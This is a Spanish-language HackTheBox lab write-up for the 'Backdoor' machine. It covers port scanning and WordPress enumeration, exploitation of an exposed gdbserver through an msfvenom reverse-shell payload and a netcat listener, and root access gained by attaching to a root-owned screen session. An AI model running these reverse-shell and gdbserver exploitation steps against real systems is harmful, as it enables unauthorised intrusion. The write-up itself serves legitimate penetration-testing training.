Backdoor es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad Fácil.
En este caso se trata de una máquina basada en el Sistema Operativo Linux.
Índice
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Backdoor 10.10.11.125 a /etc/hosts como backdoor.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
# Nmap 7.92 scan initiated Wed Dec 29 11:59:58 2021 as: nmap -sV -sC -p- -oA enumeration/nmap2 10.10.11.125 Nmap scan report for backdoor.htb (10.10.11.125) Host is up (0.050s latency). Not shown: 65532 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA) | 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA) |_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-generator: WordPress 5.8.1 |_http-title: Backdoor – Real-Life 1337/tcp open waste? Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Dec 29 12:00:41 2021 -- 1 IP address (1 host up) scanned in 43.49 seconds |
Observamos varios puertos así que vamos a ver que podemos encontrar en cada uno de ellos.
Enumeracion
Ya se ve en la propia enumeración que hay un portal web con el cms wordpress y cuya versión es la 5.8.1, accedemos al portal y encontramos la siguiente pantalla
Vista ya la versión vamos a hacer varias enumeraciones a ver que podemos encontrar, como enumeración de directorios con gobuster
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
$ gobuster dir -u http://backdoor.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 150 =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://backdoor.htb/ [+] Method: GET [+] Threads: 150 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/12/29 11:56:59 Starting gobuster in directory enumeration mode =============================================================== /wp-content (Status: 301) [Size: 317] [--> http://backdoor.htb/wp-content/] /wp-includes (Status: 301) [Size: 318] [--> http://backdoor.htb/wp-includes/] /wp-admin (Status: 301) [Size: 315] [--> http://backdoor.htb/wp-admin/] /server-status (Status: 403) [Size: 277] =============================================================== 2021/12/29 11:58:44 Finished =============================================================== |
Exploits disponibles
1 2 3 4 5 6 7 8 9 |
$ searchsploit Wordpress 5.8.1 --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities | php/webapps/39553.txt WordPress Plugin iThemes Security < 7.0.3 - SQL Injection | php/webapps/44943.txt WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection | php/webapps/48918.sh --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results |
O escaneo con la tool wpscan
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 |
$ wpscan --url http://backdoor.htb --api-token sxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.20 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://backdoor.htb/ [10.10.11.125] [+] Started: Wed Dec 29 12:04:37 2021 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.41 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://backdoor.htb/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://backdoor.htb/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://backdoor.htb/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://backdoor.htb/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09). | Found By: Rss Generator (Passive Detection) | - http://backdoor.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator> | - http://backdoor.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator> | | [!] 1 vulnerability identified: | | [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate | Fixed in: 5.8.2 | References: | - https://wpscan.com/vulnerability/cc23344a-5c91-414a-91e3-c46db614da8d | - https://wordpress.org/news/2021/11/wordpress-5-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/ticket/54207 [+] WordPress theme in use: twentyseventeen | Location: http://backdoor.htb/wp-content/themes/twentyseventeen/ | Latest Version: 2.8 (up to date) | Last Updated: 2021-07-22T00:00:00.000Z | Readme: http://backdoor.htb/wp-content/themes/twentyseventeen/readme.txt | Style URL: http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 2.8 (80% confidence) | Found By: Style (Passive Detection) | - http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8' [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:01 <============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:01 [i] No Config Backups Found. [+] WPScan DB API OK | Plan: free | Requests Done (during the scan): 2 | Requests Remaining: 23 [+] Finished: Wed Dec 29 12:04:46 2021 [+] Requests Done: 175 [+] Cached Requests: 5 [+] Data Sent: 44.419 KB [+] Data Received: 518.888 KB [+] Memory used: 241.133 MB [+] Elapsed time: 00:00:09 |
Revisando y buscando en google vemos alguna opción pero nada relevante en este punto así que pasamos a revisar el puerto 1337 correspondiente a gdbserver y encontramos un exploit en python para explotar el mismo y conseguir acceso a la máquina.
Así que siguiendo la ayuda del exploit:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
$ python3 gdbexploit.py -h Usage: python3 gdbexploit.py <gdbserver-ip:port> <path-to-shellcode> Example: - Victim's gdbserver -> 10.10.10.200:1337 - Attacker's listener -> 10.10.10.100:4444 1. Generate shellcode with msfvenom: $ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin 2. Listen with Netcat: $ nc -nlvp 4444 3. Run the exploit: $ python3 gdbexploit.py 10.10.10.200:1337 rev.bin |
En primer lugar generaremos nuestra shellcode
1 2 3 4 5 6 |
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 PrependFork=true -o rev.bin [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 92 bytes Saved as: rev.bin |
Levantamos nuestra escucha con netcat y lanzamos el exploit
1 2 3 4 5 |
$ python3 gdbexploit.py 10.10.11.125:1337 ../payloads/rev.bin [+] Connected to target. Preparing exploit [+] Found x64 arch [+] Sending payload [*] Pwned!! Check your listener |
Y obtendremos acceso con el usuario user en la máquina
1 2 3 4 5 |
$ nc -lvp 4444 listening on [any] 4444 ... connect to [10.10.14.6] from backdoor.htb [10.10.11.125] 56906 id uid=1000(user) gid=1000(user) groups=1000(user) |
Obteniendo la flag de user
Ahora que ya tenemos acceso, obtenemos una shell con python y cogemos nuestra flag
1 2 3 4 5 6 7 8 |
user@Backdoor:/home/user$ ls -l ls -l total 4 -rw-r----- 1 root user 33 Dec 29 10:57 user.txt user@Backdoor:/home/user$ cat user.txt cat user.txt 7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx9 user@Backdoor:/home/user$ |
Escalado de privilegios
Para escalar privilegios revisamos los ficheros existentes, permisos, procesos, etc… y encontramos un proceso interesante con pspy
1 2 3 |
user@Backdoor:/home/user$ ps aux|grep screen ps aux|grep screen root 859 0.0 0.0 2608 1600 ? Ss 10:57 0:00 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done |
El cual además se ejecuta cada cierto tiempo mediante un cron como root, por lo que puede ser una opción.
Tratamos de ejecutar el mismo y nos da un error debido a que no tenemos definido ningún tipo de terminal a utilizar
1 2 3 |
user@Backdoor:/home/user$ screen screen Please set a terminal type. |
Así que exportamos la variable TERM con un tipo de terminal
1 2 |
user@Backdoor:/home/user$ export TERM=xterm export TERM=xterm |
Y lanzamos screen accediendo a un screen, previamente creado, del usuario root y cuyo nombre del screen es también root para conseguir escalar al mismo
1 2 3 4 |
user@Backdoor:/home/user$ screen -x root/root root@Backdoor:~# id id uid=0(root) gid=0(root) groups=0(root) |
Obteniendo la flag de root
Ahora que ya somos root sólo nos queda obtener nuestra flag
1 2 3 4 5 6 7 8 |
root@Backdoor:~# ls -l ls -l total 4 -rw-r--r-- 1 root root 33 Dec 29 10:57 root.txt root@Backdoor:~# cat root.txt cat root.txt 9xxxxxxxxxxxxxxxxxxxxxxxxxxxx0 root@Backdoor:~# |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace